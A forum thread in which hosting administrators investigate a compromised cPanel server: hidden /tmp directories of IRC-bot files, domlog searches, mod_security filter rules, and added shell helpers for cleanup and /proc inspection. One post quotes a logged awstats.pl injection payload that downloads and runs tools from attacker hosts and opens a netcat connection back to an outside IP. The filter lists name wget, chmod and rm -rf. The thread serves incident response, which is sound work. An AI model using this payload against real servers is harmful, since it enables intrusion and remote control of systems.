Hi,

I have a really weird problem. He hosted (via a hack) his domain on one of our cPanel servers; the place where he hosted his site was /usr/local/apache/.../ . I removed him from the server and he went and hosted it on one of my other servers (actually, he tried it on many servers in that IP series). Now, after removing him several times, he has switched to other hosts. I have been watching this site, and it is switching servers very easily. The website in question is http://hothackers.com

I really don't understand how he edits the httpd.conf file (permission 644, owned by root) and adds whatever entries he likes. The kernel on our server is 2.4.29-ow1 (the Openwall kernel is meant to be a secure one), and the kernels are statically compiled (monolithic kernel) to avoid module-level hacking. He has hacked both the RedHat 9 and CentOS servers. cPanel is updated to the latest stable version.

Any idea how he's hacking in, and how it can be prevented? In the meantime, he doesn't have any problem hosting his site for free anywhere he wants. Luckily, he is not with me anymore; he seems to be on a server hosted by ThePlanet. And all his files are under the ownership of bin.

Anyone had any such experiences before? Any ideas would be greatly appreciated.

Regards,
Amal.
Check your domlogs.

They get in mostly through holes in PHP apps. They then install their own shell app and God knows what. Also check your tmp directories for stuff like .../

I suggest you run securetmp, which helps.
Such files/directories are usually best deleted through SFTP; if you're not careful you can end up wiping your whole server.
__________________
Jonathan Michaelson, cPanel Forum Moderator
Need your cPanel servers secured and tuned? cPanel Server Configuration, Security, Recovery and Antivirus/AntiSpam Services
Developers of the most effective (and free) Firewall & Security Solution for cPanel Servers - csf
http://www.configserver.com
If this is the only directory in /tmp you could hit Tab and it will put it in the shell prompt. I have also been able to do cd ".\ /". I usually just rename the directory, then go in there to see what is there, and then remove it.
|
|
It can be deleted, and it's where the main hacker files are located.

It may have a space before or after the name. They sometimes place several spaces after the name. So you have .../[space] or whatever (where [space] is a space). Just do rm -fr .../ Make sure you get the line right, else you may erase the wrong thing. Try the cd command first; if you can cd to it then you know how to delete it.

You need to do three things fast. First, get rid of his files. Reboot the server right after you delete the files. Last, you need to find the PHP app he used to get in. This is the hard part. Look for stuff like mydomain.com/help.php?q=http://somedomain The hacker passes a domain to the app and it invokes the download of the tools the hacker uses, which wind up in your tmp directory. If you didn't use the script securetmp then you may find these files in usr/tmp or var/tmp as well. Securetmp makes it harder for them to do this stuff but is not 100%, and a good hacker can get around it.

Vin
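As an added example (not from this thread or any of its posters), the steps above carried out on a scratch directory instead of the real /tmp: make the odd names visible before deleting anything, then let find hand each path to rm as a single argument so a trailing space cannot be lost at the shell. The directory names are constructed to mirror the ones described in the thread ("...", "... " and "..\ "); the legit.sock entry is there only to show that normal files survive.

```shell
#!/bin/bash
# Added example, not from the thread. Scratch-directory demo of finding and
# removing hidden /tmp entries whose names are only dots, backslashes and
# spaces ("...", "... ", "..\ "), which is what the posts above describe.

# Build a scratch directory that mimics the situation (constructed, not real
# attacker files): three odd directories plus one entry that must survive.
make_scratch_tmp() {
    local scratch
    scratch=$(mktemp -d) || return 1
    mkdir "$scratch/..."            # three dots
    mkdir "$scratch/... "           # three dots and a trailing space
    mkdir "$scratch/..\\ "          # two dots, a backslash and a space
    touch "$scratch/.../smbd" "$scratch/.../start"
    touch "$scratch/legit.sock"     # must survive the cleanup
    printf '%s\n' "$scratch"
}

# Show every dot-named entry directly under DIR with its name in brackets, so
# trailing spaces are visible, and with control characters escaped by cat -v.
# Do this before typing any rm.
list_dot_entries() {
    find "$1" -mindepth 1 -maxdepth 1 -name '.*' \
        -exec sh -c 'for p; do printf "[%s]\n" "${p##*/}"; done' sh {} + | cat -v
}

# Remove dot-named entries whose name consists only of dots, backslashes and
# spaces. find passes each path to rm as one argument, so a trailing space in
# the name cannot be eaten by the shell, and "--" stops rm from reading a
# name beginning with "-" as an option. Normal dotfiles (".htaccess" etc.)
# do not match the regex and are left alone.
remove_dot_junk() {
    find "$1" -mindepth 1 -maxdepth 1 -name '.*' -regex '.*/[.\\ ]*' \
        -exec rm -rf -- {} +
}

# Number of entries directly under DIR (used to confirm what was removed).
count_entries() {
    find "$1" -mindepth 1 -maxdepth 1 | wc -l | tr -d ' '
}

# Usage on a scratch copy:
#   d=$(make_scratch_tmp); list_dot_entries "$d"; remove_dot_junk "$d"; rm -rf "$d"
```

Against a real /tmp, run list_dot_entries first and read the bracketed names; only then point remove_dot_junk at it. The regex is deliberately narrow (dots, backslashes, spaces only) so that a legitimate hidden socket or lock file is never matched.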
Hello all.

Yes, it is "/tmp/..\[space]/" and the files in it:

Code:
drwx------ 3 nobody nobody   1024 May  1 06:10 ./
drwxrwxrwt 7 root   root   406528 May  7 08:40 ../
-rw-r--r-- 1 nobody nobody    307 Mar 27 11:50 1.users
-rw-r--r-- 1 nobody nobody    393 Mar 27 11:51 2.users
-rw-r--r-- 1 nobody nobody    393 Mar 27 11:52 3.users
-rw-r--r-- 1 nobody nobody     45 Feb  2 14:28 bebe.tgz
-rw-r--r-- 1 nobody nobody     34 Aug 15  2004 LinkEvents
-rw-r--r-- 1 nobody nobody   4008 Mar 27 11:46 mech.set
drwx------ 2 nobody nobody   1024 May  1 06:10 randfiles/
-rwx------ 1 nobody nobody 472230 Aug 15  2004 smbd*
-rwxr-xr-x 1 nobody nobody     53 Aug 15  2004 start*

Code:
drwx------ 3 nobody nobody   1024 May  7 01:21 ./
drwxrwxrwt 7 root   root   406528 May  7 08:44 ../
-rw-r--r-- 1 nobody nobody    608 May  7 00:00 1.users
-rw-r--r-- 1 nobody nobody    607 May  7 00:00 2.users
-rw-r--r-- 1 nobody nobody    610 May  7 00:00 3.users
-rw-r--r-- 1 nobody nobody     45 Feb  2 14:28 bebe.tgz
-rw-r--r-- 1 nobody nobody  82057 May  7 00:00 JoJo.seen
-rw-r--r-- 1 nobody nobody   2706 May  5 19:51 LinkEvents
-rw-r--r-- 1 nobody nobody   1033 May  7 00:00 mech.levels
-rw------- 1 nobody nobody      5 May  2 12:25 mech.pid
-rw-r--r-- 1 nobody nobody   1349 May  7 00:00 mech.session
-rw-r--r-- 1 nobody nobody   4008 Mar 27 11:46 mech.set
drwx------ 2 nobody nobody   1024 May  7 01:21 randfiles/
-rwx------ 1 nobody nobody 472230 Aug 15  2004 smbd*
-rwxr-xr-x 1 nobody nobody     53 Aug 15  2004 start*
-rw-r--r-- 1 nobody nobody  79359 May  7 00:00 TaKe.seen
-rw-r--r-- 1 nobody nobody  82548 May  7 00:00 ToTo.seen

Last edited by iCARus; 05-07-2005 at 03:30 AM.
Delete the directory and files.

Run the script securetmp; this will help. He is using your server to spread a virus by sending emails out. You need to now find out how he got in. Run these commands in a shell and look for any reference to tmp:

cd /usr/local/apache/domlogs
grep "/tmp" *;grep Wget *;grep wget *

You can run them one at a time, like grep "/tmp" *, if you get too much output, or send the output to a file. You will see something like somefile.php?q=some_url The URL for some_url is another infected server; I would send them an email to notify them their server has been hacked.

Hackers use your server to A: break into other servers, B: launch attacks or send virus emails out to hundreds of thousands. There should be a government agency to crack down on these people but there is none. Over time they will get better at hacking and it will create a major problem for the internet. Most hackers are just in the learning stages at this point, thank God for that. When they become pros you will have little defense and maybe no defense.

Vin
Thank you all for the replies.

1. We have installed chkrootkit and rkhunter and everything looks OK.
2. If we try to look into domlogs we get the error "-bash: /bin/grep: Argument list too long". Is there any other way to look into over 100 logs?
3. We deleted the created dirs in /tmp.
4. From the first day we have used /tmp secured with securetmp.
You should be able to run the commands one by one.

grep "/tmp" *
grep wget *
grep Wget *

The first one will most likely show the most info on your hacker. rkhunter is good to have, but it shows false alarms for a few things.

You can also run this:

find / -type d -name ".*" -print

It will search your whole hard drive for funky entries. You will get many showing up like ./foldername and some files that begin with a dot. Those are normal; just look for ones that are not normal looking.

Vin
I see frequent appearances of these in domlogs:

/cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20ra-ducu.go.ro%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bcd%20..%3brm%20-rf%20b.tgz%3brm%20-rf%20b%3bwget%20ra-ducu.go.ro%2fnc%3bchmod%20%2bx%20nc%3b.%2fnc%2066.221.209.161%2065000%3bwget%20excalibur.go.ro%2ffirewall%3bchmod%20%2bx%20firewall%3b.%2ffirewall%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352 0 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts)" "-" "-"

I do not have awstats activated. This happens on 2 domains very frequently. 406 because of mod_sec, and it's all coming from a cihost IP: 66.221.200.58

Anup
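As an added example (not from this thread or any of its posters), the domlog search suggested earlier in the thread, done in a way that does not hit "Argument list too long", followed by a decoder for hits of the kind quoted above. The log lines are constructed for the demo: the awstats payload is shortened and the attacker hosts are replaced with example.com and example.net. This needs bash (its printf understands \x escapes).

```shell
#!/bin/bash
# Added example, not from the thread. Scans Apache domlogs for the indicators
# discussed above (/tmp, wget, help.php?q=http://..., awstats configdir=)
# without hitting "Argument list too long", then URL-decodes a hit so the
# injected command and the download hosts are readable.

# Constructed sample log lines modelled on the awstats hit quoted above; the
# payload is shortened and the attacker hosts replaced with example.* names.
SAMPLE_LOG='127.0.0.1 - - [07/May/2005:01:21:09 -0500] "GET /cgi-bin/awstats.pl?configdir=%20%7c%20cd%20%2ftmp%3bwget%20example.com%2fb.tgz%3btar%20xzvf%20b.tgz%3bcd%20b%3b.%2fstart%3bhistory%20-c%20%7c%20 HTTP/1.1" 406 352
127.0.0.1 - - [07/May/2005:01:22:10 -0500] "GET /index.php HTTP/1.1" 200 1042
127.0.0.1 - - [07/May/2005:01:23:11 -0500] "GET /help.php?q=http://example.net/cmd.txt HTTP/1.1" 200 83'

# Write the sample into a scratch "domlogs" directory with one file per site.
make_scratch_domlogs() {
    local dir i
    dir=$(mktemp -d) || return 1
    for i in 1 2 3; do
        printf '%s\n' "$SAMPLE_LOG" > "$dir/site$i.example.com"
    done
    printf '%s\n' "$dir"
}

# grep every log file under DIR for the usual indicators. "grep ... *" fails
# once the shell's expanded file list exceeds ARG_MAX; find runs grep in
# batches that fit, and -H keeps the file name on each hit.
scan_domlogs() {
    find "$1" -type f -exec grep -H -i -E \
        '/tmp|wget|curl|configdir=|[?]q=https?://' {} +
}

# Decode %XX sequences (and + as space). printf %b also interprets
# backslash escapes, so a literal backslash in the input is not preserved.
urldecode() {
    local s=${1//+/ }
    printf '%b\n' "${s//%/\\x}"
}

# Pull the configdir= value out of an awstats hit and decode it, giving the
# command as the attacker's shell saw it. Returns 1 for other lines.
extract_injected_command() {
    local q=$1
    case $q in *configdir=*) ;; *) return 1 ;; esac
    q=${q#*configdir=}      # drop everything up to the parameter
    q=${q%% HTTP/*}         # drop the protocol and the rest of the log line
    urldecode "$q"
}

# Hosts the payload fetches tools from (the next server to notify, as the
# thread suggests): split the command on ; and |, keep wget/curl targets.
download_hosts() {
    extract_injected_command "$1" | tr ';|' '\n\n' |
        awk '$1 == "wget" || $1 == "curl" {
                 sub(/^https?:\/\//, "", $2); split($2, a, "/"); print a[1]
             }' | sort -u
}

# Usage on the scratch copy:
#   d=$(make_scratch_domlogs); scan_domlogs "$d"
#   scan_domlogs "$d" | while IFS= read -r hit; do download_hosts "$hit"; done
```

On a real server point scan_domlogs at /usr/local/apache/domlogs; the find/-exec form is the answer to the "Argument list too long" error mentioned earlier, because the file list never goes through the shell. Decode hits before acting on them: the 406 from mod_security only says the request was refused, and the decoded command is what tells you which hosts and paths to look for.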
Might want to add:

SecFilter "tar\x20"
SecFilter "go.ro"
SecFilter "chmod\x20"
SecFilter "wget"
SecFilter "rm\x20-rf"

This should help. Of course, make sure mod_security is active on the servers. Also remove that script, and when the process is running, use ps -u nobody to get the PID, then go to /proc/(pid) and ls -al. You may see some virtual linked files to where the files are, usually /dev/shm or /tmp, sometimes /var/spool I've seen, sometimes even /usr/local/apache/proxy. Also cat the process's environment; you might be able to pull a directory from there.

Also, this shouldn't cause any issues with regular sites. He seems to be using the Awstats exploit via a script, or he's just uploading a script and calling it that:

SecFilter "awstats.pl"

Since people should be accessing Awstats via cPanel regardless, it shouldn't cause any issues.

Thanks,
Kris
Kris@HostMerit.com
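As an added example (not from this thread or any of its posters), the /proc inspection described in the post above written out as shell helpers: list a user's processes, then read one process's working directory, executable, command line, open descriptors and environment. The helpers are exercised on the current shell ($$) so they can be tried without a compromised process at hand; reading another user's environ needs root.

```shell
#!/bin/bash
# Added example, not from the thread. Helpers for the /proc inspection the
# post above describes: list a user's processes, then read cwd, exe, open
# files and the environment of one of them. Exercised on the current shell
# ($$) so it can be run without a compromised process at hand.

# PIDs owned by USER, one per line (ps -u as above, -o pid= for bare output).
pids_of_user() {
    ps -u "$1" -o pid= 2>/dev/null | tr -d ' '
}

# Where the process was started. For the thread's case this is usually the
# hidden /tmp directory, and the link still resolves after it was deleted.
proc_cwd() {
    readlink "/proc/$1/cwd"
}

# The binary actually running. Linux appends " (deleted)" when the file was
# removed after launch, which is common with tools unpacked in /tmp.
proc_exe() {
    readlink "/proc/$1/exe"
}

# Environment at exec time as VAR=value lines. PWD, OLDPWD and HOME often
# point at the directory the tools were run from. Needs root for other users.
proc_env() {
    tr '\0' '\n' < "/proc/$1/environ"
}

# One-screen summary: cwd, exe, command line and every open file descriptor.
# Open descriptors show what the process is doing (sockets, pipes, log files).
proc_summary() {
    local pid=$1 fd
    [ -d "/proc/$pid" ] || { echo "no /proc entry for pid $pid" >&2; return 1; }
    echo "cwd: $(proc_cwd "$pid")"
    echo "exe: $(proc_exe "$pid")"
    echo "cmd: $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    echo "fds:"
    for fd in "/proc/$pid"/fd/*; do
        [ -L "$fd" ] || continue
        printf '  %s -> %s\n' "${fd##*/}" "$(readlink "$fd")"
    done
}

# Usage: for p in $(pids_of_user nobody); do proc_summary "$p"; done
```

Do this before killing the process: once it exits, the cwd and exe links (which survive even if the attacker has already deleted the files) and the open sockets are gone with it.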